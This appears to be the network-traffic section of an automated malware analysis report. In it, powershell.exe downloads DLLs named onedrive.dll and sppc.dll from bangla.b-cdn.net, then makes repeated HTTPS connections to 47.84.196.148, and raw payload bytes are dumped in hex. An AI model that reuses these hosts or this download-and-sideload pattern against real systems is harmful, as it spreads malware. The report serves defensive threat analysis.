                                      Dec 19, 2024 13:36:21.797399998 CET49709443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:21.798705101 CET49709443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:21.798718929 CET4434970947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:21.799077988 CET4434970947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:21.846442938 CET49709443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:21.850359917 CET49709443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:21.850378990 CET49709443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:21.850619078 CET4434970947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:22.689477921 CET4434970947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:22.689693928 CET4434970947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:22.689778090 CET49709443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:22.689968109 CET49709443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:22.690007925 CET4434970947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:22.690035105 CET49709443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:22.690049887 CET4434970947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:51.881057024 CET49785443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:51.881160975 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:51.881278992 CET49785443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:51.881690979 CET49785443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:51.881727934 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:53.790841103 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:53.791652918 CET49785443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:53.791702032 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:53.803867102 CET49785443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:53.803890944 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:53.803951979 CET49785443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:53.803961992 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:54.709228039 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:54.709290028 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:54.709357023 CET49785443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:54.709866047 CET49785443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:54.709889889 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:36:54.709903955 CET49785443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:36:54.709911108 CET4434978547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:31.521915913 CET49879443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:37:31.521996975 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:31.526298046 CET49879443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:37:31.530494928 CET49879443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:37:31.530538082 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:33.212268114 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:33.216269016 CET49879443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:37:33.216289997 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:33.245439053 CET49879443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:37:33.245440006 CET49879443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:37:33.245466948 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:33.245517969 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:34.117444038 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:34.117523909 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:34.117580891 CET49879443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:37:34.117707968 CET49879443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:37:34.117748022 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:37:34.117779016 CET49879443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:37:34.117793083 CET4434987947.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:09.850261927 CET49965443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:09.850317955 CET4434996547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:09.850380898 CET49965443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:09.850961924 CET49965443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:09.850981951 CET4434996547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:11.523046970 CET4434996547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:11.523153067 CET49965443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:11.527365923 CET49965443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:11.527385950 CET4434996547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:11.527610064 CET4434996547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:11.560529947 CET49965443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:11.560600996 CET49965443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:11.560743093 CET4434996547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:12.406048059 CET4434996547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:12.406156063 CET4434996547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:12.406199932 CET49965443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:12.406342983 CET49965443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:12.406348944 CET4434996547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:42.146163940 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:42.146209955 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:42.146286964 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:42.146704912 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:42.146719933 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:43.846441984 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:43.846530914 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:43.848345995 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:43.848351955 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:43.849116087 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:43.882306099 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:43.882306099 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:43.882482052 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:44.737021923 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:44.737337112 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:44.738924980 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:44.742896080 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:44.742914915 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:38:44.742937088 CET49983443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:38:44.742944002 CET4434998347.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:21.208311081 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:21.208368063 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:21.210102081 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:21.210745096 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:21.210760117 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:22.885863066 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:22.886054993 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:22.887913942 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:22.887933969 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:22.888277054 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:22.922673941 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:22.922673941 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:22.922837019 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:23.703131914 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:23.703219891 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:23.703463078 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:23.703712940 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:23.703712940 CET49984443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:23.703736067 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:23.703748941 CET4434998447.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:51.272222042 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:51.272289038 CET4434998547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:51.272466898 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:51.272972107 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:51.272984982 CET4434998547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:52.948055029 CET4434998547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:52.948306084 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:52.951968908 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:52.952006102 CET4434998547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:52.952387094 CET4434998547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:52.978893042 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:52.978893042 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:52.979043961 CET4434998547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:53.830974102 CET4434998547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:53.831072092 CET4434998547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:53.832046032 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:53.832221031 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:53.832221031 CET49985443192.168.2.547.84.196.148
                                      Dec 19, 2024 13:39:53.832237005 CET4434998547.84.196.148192.168.2.5
                                      Dec 19, 2024 13:39:53.832246065 CET4434998547.84.196.148192.168.2.5
                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 19, 2024 13:36:09.630408049 CET5250653192.168.2.51.1.1.1
                                      Dec 19, 2024 13:36:09.855362892 CET53525061.1.1.1192.168.2.5
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 19, 2024 13:36:09.630408049 CET192.168.2.51.1.1.10x437aStandard query (0)bangla.b-cdn.netA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 19, 2024 13:36:09.855362892 CET1.1.1.1192.168.2.50x437aNo error (0)bangla.b-cdn.net89.35.237.170A (IP address)IN (0x0001)false
                                      • bangla.b-cdn.net
                                      • 47.84.196.148
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.54970489.35.237.170805324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 19, 2024 13:36:09.991586924 CET173OUTGET /onedrive.dll HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: bangla.b-cdn.net
                                      Connection: Keep-Alive
                                      Dec 19, 2024 13:36:11.410036087 CET545INHTTP/1.1 301 Moved Permanently
                                      Date: Thu, 19 Dec 2024 12:36:11 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Server: BunnyCDN-RI1-892
                                      CDN-PullZone: 3104411
                                      CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                      CDN-RequestCountryCode: US
                                      Location: https://bangla.b-cdn.net/onedrive.dll
                                      CDN-RequestTime: 0
                                      CDN-RequestId: cce5ff613edcd2bdf7d8b05de1b24e3c
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.54970689.35.237.170805324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 19, 2024 13:36:14.847450018 CET145OUTGET /sppc.dll HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: bangla.b-cdn.net
                                      Dec 19, 2024 13:36:16.276683092 CET541INHTTP/1.1 301 Moved Permanently
                                      Date: Thu, 19 Dec 2024 12:36:16 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Server: BunnyCDN-RI1-892
                                      CDN-PullZone: 3104411
                                      CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                      CDN-RequestCountryCode: US
                                      Location: https://bangla.b-cdn.net/sppc.dll
                                      CDN-RequestTime: 1
                                      CDN-RequestId: cc17a0c79d427a63866421a4bfd0bee4
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.54970589.35.237.1704435324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 12:36:13 UTC173OUTGET /onedrive.dll HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: bangla.b-cdn.net
                                      Connection: Keep-Alive
                                      2024-12-19 12:36:13 UTC673INHTTP/1.1 200 OK
                                      Date: Thu, 19 Dec 2024 12:36:13 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 103935
                                      Connection: close
                                      Server: BunnyCDN-RI1-892
                                      CDN-PullZone: 3104411
                                      CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                      CDN-RequestCountryCode: US
                                      Cache-Control: max-age=25600000
                                      ETag: "67629393-195ff"
                                      Last-Modified: Wed, 18 Dec 2024 09:19:15 GMT
                                      CDN-StorageServer: DE-51
                                      CDN-FileServer: 1023
                                      CDN-ProxyVer: 1.06
                                      CDN-RequestPullSuccess: True
                                      CDN-RequestPullCode: 200
                                      CDN-CachedAt: 12/19/2024 12:35:11
                                      CDN-EdgeStorageId: 892
                                      CDN-Status: 200
                                      CDN-RequestTime: 0
                                      CDN-RequestId: 860d42bb9467db5af50411dc9671d440
                                      CDN-Cache: HIT
                                      Accept-Ranges: bytes
                                      2024-12-19 12:36:13 UTC16384INData Raw: b5 c1 04 0c 55 f0 75 07 79 fc d1 a8 79 c6 1e 66 04 1a 41 e1 e6 cc d5 db 56 f7 ef bb db 2a 7e 8f d3 22 66 76 2e 07 b3 39 82 d1 b4 07 f7 8b ef 50 63 b2 a4 7f 56 36 06 50 d4 78 09 2f 30 3b e4 50 8c 19 68 bd b8 0a 29 10 47 7a be 48 a6 cc 3b 5f e9 29 81 bf 9d db f7 c9 a5 73 28 6c 18 1d 8f c0 1b 79 68 9b b7 56 dc fa 4c 99 8a 63 ec 18 23 54 6a dd 1b 13 0b 3c 62 7f f6 93 fd 27 f0 61 a5 f5 33 da c7 16 03 7c da 99 57 b4 93 da f2 56 79 e4 c6 6b d2 a0 22 ed db ce ba 1f 39 d8 ed 7d 55 22 34 0d b0 f9 40 30 5a 34 5e eb 2d 05 dc 2d a5 db e6 f9 11 9c 2a 0b 23 8d a5 0b c6 a9 11 97 41 a7 c6 75 0e 92 93 92 a7 b9 f6 17 64 ab 37 17 18 a9 bc 0e 11 ff 7e 4e 81 a5 e6 c0 c1 78 df 4b 09 35 09 71 17 3d 06 a9 ae 26 3d 4e 3a c6 e5 17 34 b6 3c a6 92 9b 69 90 24 36 bd 34 9c 8b a2 f4 db
                                      Data Ascii: UuyyfAV*~"fv.9PcV6Px/0;Ph)GzH;_)s(lyhVLc#Tj<b'a3|WVyk"9}U"4@0Z4^--*#Aud7~NxK5q=&=N:4<i$64
                                      2024-12-19 12:36:13 UTC16384INData Raw: c5 9e 67 b1 99 08 f3 94 d0 57 b5 82 70 22 46 c2 25 35 8d 27 e0 c2 4b 60 df 97 ad 26 2d 50 b7 7b d3 c9 65 f0 e3 5e 13 38 ed c2 d1 de f6 4a 83 d4 bf ab a5 6f 87 03 ce 51 92 ca 87 2c f0 7c f0 95 08 1e 84 f8 42 ab f0 a2 15 a9 7a b4 41 dd 04 ac 53 98 26 b7 e3 59 fb 62 0b 85 c3 d2 72 6e 88 64 26 c8 7e 88 52 7c 3c e0 e0 7c dd 56 35 68 70 c4 62 8d ae 40 db d7 cc 1a a8 d8 82 e5 30 e9 8b 42 3c 88 76 5b e9 5a 67 b7 46 9a 40 36 9d 0f 21 0d c2 2c a4 e1 16 89 3f b3 c8 88 44 02 d0 22 60 d2 18 4a 02 60 d4 a3 3a 92 4d 6e 72 16 4b d8 ca cc de 4d 56 82 e6 9e de ad 0a 22 73 a1 fc 8b 83 88 75 77 27 f2 2c a9 15 2c bc 2f d9 c2 c4 9a d6 93 f2 e1 c3 79 12 99 45 0a c7 8b d7 a5 75 1b 62 ce cd 55 aa 9f 61 b4 db e5 bd fb 1c 46 95 0f 1d 8a a8 66 2a a4 34 07 dc 6a 70 1a 80 77 24 c2 ec
                                      Data Ascii: gWp"F%5'K`&-P{e^8JoQ,|BzAS&Ybrnd&~R|<|V5hpb@0B<v[ZgF@6!,?D"`J`:MnrKMV"suw',,/yEubUaFf*4jpw$
                                      2024-12-19 12:36:14 UTC16384INData Raw: 5f 8e 31 73 07 b0 56 9a ba a6 6b 97 1b ce ce 90 e5 a4 f6 4a d6 70 01 77 1c 36 8b 06 13 d6 a9 7f 50 26 4b 90 77 03 58 15 ca a2 69 0e 31 83 4f 0f ce 60 06 71 6b 28 1a 17 fd 8e ee 2c 21 3e 88 0c 34 b5 f8 65 25 8f 10 f7 03 3c 17 5c 37 de 41 5b 8c ea bd 8a c0 cb 35 7c c7 ef 71 99 86 70 b8 ef d7 8f 90 69 f9 fe ff 9d 42 9a d0 d0 8e 32 04 b5 90 d2 2d 0a 08 6a 8c 47 b2 9a ac 94 3a 6b c3 13 c0 49 d8 db 45 53 4e bc 9f fc 37 b6 1d 91 31 c8 59 5c ef c4 37 91 66 35 df 2f 40 6c 1e 11 65 d1 31 eb 62 dd 1d 1b b2 fd de 47 be 25 00 c8 90 1c d1 43 9c c5 2d 20 b8 95 a8 b1 15 72 ca 02 d1 a6 96 ad f3 9f 91 f3 88 3a e6 17 ef 2f 3f a0 b2 d5 be b7 87 7e c9 6d f4 a2 6b f7 0d 5b ab 54 c0 df 27 53 20 f7 c3 1a 81 5e fa 07 ee 9f f7 e0 05 96 85 07 79 b9 b7 a7 5a 66 08 51 1e 31 94 82 49
                                      Data Ascii: _1sVkJpw6P&KwXi1O`qk(,!>4e%<\7A[5|qpiB2-jG:kIESN71Y\7f5/@le1bG%C- r:/?~mk[T'S ^yZfQ1I
                                      2024-12-19 12:36:14 UTC16384INData Raw: b5 39 9a 4c 7e 90 b4 8f ef d5 52 43 11 d0 0b 8a 79 44 d4 27 63 17 ec 04 b6 8d b3 d7 ba 08 d4 0d 39 d5 f2 2b 23 38 bb b3 5c 69 ab e5 72 0f b6 5b c7 a5 13 50 7c 4b c8 aa 20 0d 00 15 27 4f 5b 03 d6 fc 41 57 40 64 46 6a 3b 68 07 19 14 38 ad 07 5f f0 81 fa a4 21 96 14 9c 7c 11 4f b7 8a c9 30 6a cd 8c 92 ad a0 ca 32 55 a9 67 c6 02 52 5f 84 80 fc 32 1f 98 2c 69 19 7c 9a 6e 17 45 33 92 a9 20 6d 8e 6b c4 94 a6 b9 7d bd 3c ef fc c0 f7 58 29 5b e6 62 66 58 5a 19 a1 50 17 ca a0 c0 88 f5 51 72 df 0c b3 ad 54 46 5f 5a b7 18 6e 65 49 66 68 17 29 ef c1 c7 d6 8f 44 15 18 56 7b e3 5b 9d 76 f0 f2 79 41 05 75 23 a3 be a7 ac 9a 1d 35 76 cb 17 97 3a 9a 8c e3 45 79 c4 61 ef e7 7c 6d d3 33 f8 3c f6 37 ae 65 df 02 1d 0d a1 e6 1f e9 47 da 67 f2 27 a4 db 34 83 79 c3 7d 99 54 1f 19
                                      Data Ascii: 9L~RCyD'c9+#8\ir[P|K 'O[AW@dFj;h8_!|O0j2UgR_2,i|nE3 mk}<X)[bfXZPQrTF_ZneIfh)DV{[vyAu#5v:Eya|m3<7eGg'4y}T
                                      2024-12-19 12:36:14 UTC16384INData Raw: fa 6c 12 df f2 60 fd f9 ef 5e 87 a9 13 23 b7 97 ff b7 cc fb 7a 73 81 a3 db 9c 2c 6a a7 8a 78 c3 23 bb 8c bb 13 57 42 94 e3 b6 91 1f 6c 46 b4 b5 0a 02 ea 25 00 8d d4 71 bd 07 55 92 cc 01 71 19 df 21 34 9b 14 3f 76 0b 09 74 25 4d 0e 70 97 36 4c f9 78 35 43 d4 8e d3 0f 7a c2 de 45 00 61 b0 a6 12 39 b2 66 5c bb 8d be 10 7a e6 57 51 89 dd 50 72 77 77 c9 45 2f 94 4f e9 ac e9 14 19 55 aa 4a 63 31 dc 49 0b 0f 9a 56 5e ec 97 69 4f b0 27 a1 17 f0 55 06 6b 10 4f b5 49 07 d9 1f 6c 7b e8 94 1b 1b 0c 29 33 24 6e 67 28 c3 ce 98 98 ef 05 ff 93 03 21 db d0 7c af 84 7a ff 53 0f 3e b8 6d 6d 7e cc 4a 7c 57 f7 50 c2 74 45 a0 d6 c4 f2 ef 60 9b 94 d1 d4 99 c0 5d 32 86 e4 f7 da ce ec 25 ba 69 c5 8e be 16 3a ae b8 80 ab 14 c7 fa f9 e7 b0 a7 da 01 ee 9b de e4 f1 d2 0f fa e2 dc 2a
                                      Data Ascii: l`^#zs,jx#WBlF%qUq!4?vt%Mp6Lx5CzEa9f\zWQPrwwE/OUJc1IV^iO'UkOIl{)3$ng(!|zS>mm~J|WPtE`]2%i:*
                                      2024-12-19 12:36:14 UTC16384INData Raw: b9 5f 21 48 c4 b1 29 33 ff 0d bf 61 22 ed ee ae a4 3c 7a 0e ae 08 a2 39 3f 0f ad 73 6a da 08 cc dc 4e 04 45 48 c2 dc 66 45 68 1e 1c 1a 8d 5e bc fd 3d a6 c4 09 d9 56 83 78 5c b4 6e 97 73 43 71 3d 05 f2 c7 ea b9 b3 5e d4 5d 2c 28 3e d7 47 af e1 ae 05 4d de b2 87 36 1e 30 20 f7 c8 64 c0 b8 3f 6b 98 8b e8 f9 dd 66 80 25 c3 96 6d 56 60 f8 a2 d2 82 05 98 4e 7b 19 23 08 d5 bf f5 e0 6f 24 4e ba 63 8f 06 a6 7d 6e 6c fb d7 1c 09 53 10 c1 01 36 a6 c2 3f 99 a8 22 2c cf 2d e6 84 c9 0e c6 ba 9b de 52 b5 8f 65 ef 14 0e bd 1d a6 d0 56 9c b6 ab 99 91 7d 09 53 48 52 62 af 22 e4 16 98 ef dd 6a 50 43 1e 03 a2 84 ba e0 8e 10 e4 87 37 2c ea fb 71 75 65 79 d3 83 4a 7e e0 2a 11 b5 d8 33 f7 1c d7 90 e6 08 cf c2 67 b8 1a 31 0f 15 20 be e2 e3 ab e0 9e c1 2c 28 b5 d8 14 32 58 30 30
                                      Data Ascii: _!H)3a"<z9?sjNEHfEh^=Vx\nsCq=^],(>GM60 d?kf%mV`N{#o$Nc}nlS6?",-ReV}SHRb"jPC7,queyJ~*3g1 ,(2X00
                                      2024-12-19 12:36:14 UTC5631INData Raw: dd ac 8e 7f 14 b4 5e 1d 04 8a da f3 76 ba 52 da f9 2b 8f 45 6b b2 aa 5c 46 63 0a c3 36 9e 10 5e dc ad e0 ae 6b 0d 78 94 72 5f ce c3 b1 3b 17 f4 47 67 5b 43 da ec dd 2b fc ec bb 12 23 32 06 08 fe 66 9a 2b 28 d8 fb a4 4e f5 9b 25 0a 7e 1b c0 cf c1 26 57 4d b5 75 cf 6b 06 c0 34 a2 06 3a 14 c0 3c 65 59 f4 cf f0 90 df 85 be c9 3f 7e 15 ab 8b 5e 44 ce fb 41 23 bd 30 86 21 fb 6f 74 e7 1a 34 6f 0e 64 5f b9 af 44 36 ef e8 2f 94 4d b2 d2 04 aa a3 a5 96 8d 16 1d ad ea e7 46 e1 30 a5 b2 53 fc 17 1c e9 38 86 33 6a 0a 09 1e 15 e5 a5 81 d9 7e 90 06 b2 56 81 a4 59 f5 d4 7c 04 90 6c bc 91 37 6c 94 88 a8 a4 40 04 ff e2 e5 2f a9 ad 68 ec 63 71 5d 0d fc b3 44 aa f1 20 07 33 e1 fc 28 74 31 d1 2e 5a 09 65 97 e8 7f c3 62 16 82 1f ad de b0 73 40 38 f4 01 f5 0d 02 ba b3 f3 4d 2f
                                      Data Ascii: ^vR+Ek\Fc6^kxr_;Gg[C+#2f+(N%~&WMuk4:<eY?~^DA#0!ot4od_D6/MF0S83j~VY|l7l@/hcq]D 3(t1.Zebs@8M/


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.54970789.35.237.1704435324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 12:36:17 UTC145OUTGET /sppc.dll HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: bangla.b-cdn.net
                                      2024-12-19 12:36:18 UTC673INHTTP/1.1 200 OK
                                      Date: Thu, 19 Dec 2024 12:36:18 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 371712
                                      Connection: close
                                      Server: BunnyCDN-RI1-892
                                      CDN-PullZone: 3104411
                                      CDN-Uid: 73bf0b00-2886-453c-ad69-38229cfc7e90
                                      CDN-RequestCountryCode: US
                                      Cache-Control: max-age=25600000
                                      ETag: "67629392-5ac00"
                                      Last-Modified: Wed, 18 Dec 2024 09:19:14 GMT
                                      CDN-StorageServer: DE-587
                                      CDN-FileServer: 976
                                      CDN-ProxyVer: 1.06
                                      CDN-RequestPullSuccess: True
                                      CDN-RequestPullCode: 200
                                      CDN-CachedAt: 12/19/2024 12:35:14
                                      CDN-EdgeStorageId: 892
                                      CDN-Status: 200
                                      CDN-RequestTime: 0
                                      CDN-RequestId: cbc0db157b13bb6f82d0e22b75b1076e
                                      CDN-Cache: HIT
                                      Accept-Ranges: bytes
